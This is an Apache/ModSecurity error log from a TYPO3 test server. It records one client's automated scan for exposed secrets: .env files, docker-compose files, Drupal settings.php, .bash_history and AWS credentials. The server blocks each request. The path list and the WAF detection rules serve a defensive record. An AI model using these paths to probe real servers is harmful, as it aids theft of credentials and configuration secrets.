[Mon Sep 30 03:12:41.972747 2024] [:error] [pid 2293063] [client 45.135.232.70:53326] [client 45.135.232.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/db.config"] [unique_id "Zvn7CaftDAs9z02W9bMAeQAAAAg"]
[Mon Sep 30 03:12:41.973098 2024] [:error] [pid 2293063] [client 45.135.232.70:53326] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/db.config"] [unique_id "Zvn7CaftDAs9z02W9bMAeQAAAAg"]
[Mon Sep 30 03:12:41.973264 2024] [:error] [pid 2293063] [client 45.135.232.70:53326] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/db.config"] [unique_id "Zvn7CaftDAs9z02W9bMAeQAAAAg"]
[Mon Sep 30 03:12:41.986737 2024] [authz_core:error] [pid 2293069] [client 45.135.232.70:53398] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.production.yml
[Mon Sep 30 03:12:42.011239 2024] [authz_core:error] [pid 2292852] [client 45.135.232.70:53316] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose-dev.yml
[Mon Sep 30 03:12:42.028903 2024] [authz_core:error] [pid 2292827] [client 45.135.232.70:53386] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.dev.yml
[Mon Sep 30 03:12:42.036470 2024] [authz_core:error] [pid 2292829] [client 45.135.232.70:53334] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-cloud.yml
[Mon Sep 30 03:12:42.047607 2024] [authz_core:error] [pid 2292830] [client 45.135.232.70:53872] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.076556 2024] [authz_core:error] [pid 2293063] [client 45.135.232.70:53658] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.085079 2024] [authz_core:error] [pid 2293069] [client 45.135.232.70:53764] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.101478 2024] [:error] [pid 2293061] [client 45.135.232.70:53492] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /drupal/sites/default/files/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/drupal/sites/default/files/.env.local"] [unique_id "Zvn7Cv4plfEpgwUkwScOfwAAAAc"]
[Mon Sep 30 03:12:42.101732 2024] [:error] [pid 2293061] [client 45.135.232.70:53492] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/drupal/sites/default/files/.env.local"] [unique_id "Zvn7Cv4plfEpgwUkwScOfwAAAAc"]
[Mon Sep 30 03:12:42.101884 2024] [:error] [pid 2293061] [client 45.135.232.70:53492] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/drupal/sites/default/files/.env.local"] [unique_id "Zvn7Cv4plfEpgwUkwScOfwAAAAc"]
[Mon Sep 30 03:12:42.131545 2024] [authz_core:error] [pid 2292827] [client 45.135.232.70:53416] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.staging.yml
[Mon Sep 30 03:12:42.134933 2024] [authz_core:error] [pid 2292829] [client 45.135.232.70:53864] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.138297 2024] [authz_core:error] [pid 2293081] [client 45.135.232.70:53794] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.148996 2024] [authz_core:error] [pid 2292828] [client 45.135.232.70:53612] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.176084 2024] [authz_core:error] [pid 2293063] [client 45.135.232.70:53642] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.191644 2024] [authz_core:error] [pid 2293076] [client 45.135.232.70:53358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database.yml
[Mon Sep 30 03:12:42.195310 2024] [authz_core:error] [pid 2293075] [client 45.135.232.70:53754] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.195710 2024] [authz_core:error] [pid 2293079] [client 45.135.232.70:53598] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.196740 2024] [authz_core:error] [pid 2293082] [client 45.135.232.70:53888] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.204085 2024] [authz_core:error] [pid 2293061] [client 45.135.232.70:53588] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.250212 2024] [authz_core:error] [pid 2292829] [client 45.135.232.70:53370] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.override.yml
[Mon Sep 30 03:12:42.251800 2024] [authz_core:error] [pid 2293081] [client 45.135.232.70:53408] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.prod.yml
[Mon Sep 30 03:12:42.255151 2024] [:error] [pid 2292828] [client 45.135.232.70:53508] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /drupal/sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/drupal/sites/default/settings.php"] [unique_id "Zvn7Cm142CaB14yyWJ3d9QAAAAE"]
[Mon Sep 30 03:12:42.255361 2024] [:error] [pid 2292828] [client 45.135.232.70:53508] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/drupal/sites/default/settings.php"] [unique_id "Zvn7Cm142CaB14yyWJ3d9QAAAAE"]
[Mon Sep 30 03:12:42.255511 2024] [:error] [pid 2292828] [client 45.135.232.70:53508] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/drupal/sites/default/settings.php"] [unique_id "Zvn7Cm142CaB14yyWJ3d9QAAAAE"]
[Mon Sep 30 03:12:42.274067 2024] [authz_core:error] [pid 2293072] [client 45.135.232.70:53810] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.281607 2024] [authz_core:error] [pid 2293063] [client 45.135.232.70:53834] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.303096 2024] [authz_core:error] [pid 2293075] [client 45.135.232.70:53584] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.307657 2024] [:error] [pid 2293079] [client 45.135.232.70:53474] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /drupal/sites/default/files/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/drupal/sites/default/files/.env"] [unique_id "Zvn7CoPBuFIGO_F-AsknuQAAABI"]
[Mon Sep 30 03:12:42.307969 2024] [:error] [pid 2293079] [client 45.135.232.70:53474] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/drupal/sites/default/files/.env"] [unique_id "Zvn7CoPBuFIGO_F-AsknuQAAABI"]
[Mon Sep 30 03:12:42.308127 2024] [:error] [pid 2293079] [client 45.135.232.70:53474] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/drupal/sites/default/files/.env"] [unique_id "Zvn7CoPBuFIGO_F-AsknuQAAABI"]
[Mon Sep 30 03:12:42.342881 2024] [authz_core:error] [pid 2293078] [client 45.135.232.70:53722] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.344197 2024] [authz_core:error] [pid 2292831] [client 45.135.232.70:53628] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.354280 2024] [authz_core:error] [pid 2293080] [client 45.135.232.70:53712] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.369051 2024] [authz_core:error] [pid 2292829] [client 45.135.232.70:53648] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.370380 2024] [authz_core:error] [pid 2293070] [client 45.135.232.70:53898] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.371532 2024] [authz_core:error] [pid 2293081] [client 45.135.232.70:53826] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.371601 2024] [authz_core:error] [pid 2292828] [client 45.135.232.70:53858] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.378972 2024] [authz_core:error] [pid 2293072] [client 45.135.232.70:53926] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.398324 2024] [authz_core:error] [pid 2293071] [client 45.135.232.70:53918] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.400716 2024] [authz_core:error] [pid 2292830] [client 45.135.232.70:53944] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.404744 2024] [authz_core:error] [pid 2292852] [client 45.135.232.70:53942] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.409220 2024] [authz_core:error] [pid 2293075] [client 45.135.232.70:53962] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.428163 2024] [authz_core:error] [pid 2293076] [client 45.135.232.70:53978] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.451661 2024] [authz_core:error] [pid 2293061] [client 45.135.232.70:53996] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.453679 2024] [authz_core:error] [pid 2292831] [client 45.135.232.70:54036] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.453777 2024] [authz_core:error] [pid 2293078] [client 45.135.232.70:54008] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.455300 2024] [authz_core:error] [pid 2293082] [client 45.135.232.70:53986] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.470475 2024] [authz_core:error] [pid 2293077] [client 45.135.232.70:54086] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.477691 2024] [authz_core:error] [pid 2293070] [client 45.135.232.70:54052] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.485960 2024] [authz_core:error] [pid 2293072] [client 45.135.232.70:54068] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.487146 2024] [authz_core:error] [pid 2292829] [client 45.135.232.70:54072] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.505508 2024] [authz_core:error] [pid 2293071] [client 45.135.232.70:54198] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.508272 2024] [authz_core:error] [pid 2292830] [client 45.135.232.70:54130] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.516112 2024] [authz_core:error] [pid 2293075] [client 45.135.232.70:54142] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.519126 2024] [authz_core:error] [pid 2292852] [client 45.135.232.70:54184] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.535104 2024] [authz_core:error] [pid 2292827] [client 45.135.232.70:54152] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.536034 2024] [authz_core:error] [pid 2293063] [client 45.135.232.70:54174] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.552742 2024] [:error] [pid 2293079] [client 45.135.232.70:54240] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "Zvn7CoPBuFIGO_F-AsknuwAAABI"]
[Mon Sep 30 03:12:42.553107 2024] [:error] [pid 2293079] [client 45.135.232.70:54240] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "Zvn7CoPBuFIGO_F-AsknuwAAABI"]
[Mon Sep 30 03:12:42.553298 2024] [:error] [pid 2293079] [client 45.135.232.70:54240] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "Zvn7CoPBuFIGO_F-AsknuwAAABI"]
[Mon Sep 30 03:12:42.560502 2024] [authz_core:error] [pid 2293049] [client 45.135.232.70:54282] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/gitlab-ci
[Mon Sep 30 03:12:42.570665 2024] [authz_core:error] [pid 2293061] [client 45.135.232.70:54226] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/etc
[Mon Sep 30 03:12:42.632291 2024] [authz_core:error] [pid 2292852] [client 45.135.232.70:54354] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/helm
[Mon Sep 30 03:12:42.634038 2024] [:error] [pid 2293075] [client 45.135.232.70:54322] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/gruntfile.js" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /gruntfile.js found within REQUEST_FILENAME: /gruntfile.js"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/gruntfile.js"] [unique_id "Zvn7CpFcefiV9attqbch-AAAAA4"]
[Mon Sep 30 03:12:42.634250 2024] [:error] [pid 2293075] [client 45.135.232.70:54322] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/gruntfile.js"] [unique_id "Zvn7CpFcefiV9attqbch-AAAAA4"]
[Mon Sep 30 03:12:42.634396 2024] [:error] [pid 2293075] [client 45.135.232.70:54322] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/gruntfile.js"] [unique_id "Zvn7CpFcefiV9attqbch-AAAAA4"]
[Mon Sep 30 03:12:42.648156 2024] [:error] [pid 2293081] [client 45.135.232.70:54390] [client 45.135.232.70] ModSecurity: Warning. Matched phrase ".bash_history" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .bash_history found within REQUEST_FILENAME: /home/user/.bash_history"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/home/user/.bash_history"] [unique_id "Zvn7CnipWt9E9bYxXOGg3gAAABQ"]
[Mon Sep 30 03:12:42.648467 2024] [:error] [pid 2293081] [client 45.135.232.70:54390] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/home/user/.bash_history"] [unique_id "Zvn7CnipWt9E9bYxXOGg3gAAABQ"]
[Mon Sep 30 03:12:42.648624 2024] [:error] [pid 2293081] [client 45.135.232.70:54390] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/home/user/.bash_history"] [unique_id "Zvn7CnipWt9E9bYxXOGg3gAAABQ"]
[Mon Sep 30 03:12:42.649545 2024] [:error] [pid 2292828] [client 45.135.232.70:54366] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /home/deploy/myapp/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/home/deploy/myapp/.env.production"] [unique_id "Zvn7Cm142CaB14yyWJ3d-AAAAAE"]
[Mon Sep 30 03:12:42.649772 2024] [:error] [pid 2292828] [client 45.135.232.70:54366] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/home/deploy/myapp/.env.production"] [unique_id "Zvn7Cm142CaB14yyWJ3d-AAAAAE"]
[Mon Sep 30 03:12:42.649922 2024] [:error] [pid 2292828] [client 45.135.232.70:54366] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/home/deploy/myapp/.env.production"] [unique_id "Zvn7Cm142CaB14yyWJ3d-AAAAAE"]
[Mon Sep 30 03:12:42.655556 2024] [:error] [pid 2293063] [client 45.135.232.70:54376] [client 45.135.232.70] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /home/ubuntu/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/home/ubuntu/.aws/credentials"] [unique_id "Zvn7CqftDAs9z02W9bMAfwAAAAg"]
[Mon Sep 30 03:12:42.655753 2024] [:error] [pid 2293063] [client 45.135.232.70:54376] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/home/ubuntu/.aws/credentials"] [unique_id "Zvn7CqftDAs9z02W9bMAfwAAAAg"]
[Mon Sep 30 03:12:42.655894 2024] [:error] [pid 2293063] [client 45.135.232.70:54376] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/home/ubuntu/.aws/credentials"] [unique_id "Zvn7CqftDAs9z02W9bMAfwAAAAg"]
[Mon Sep 30 03:12:42.659514 2024] [authz_core:error] [pid 2293076] [client 45.135.232.70:54442] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/home
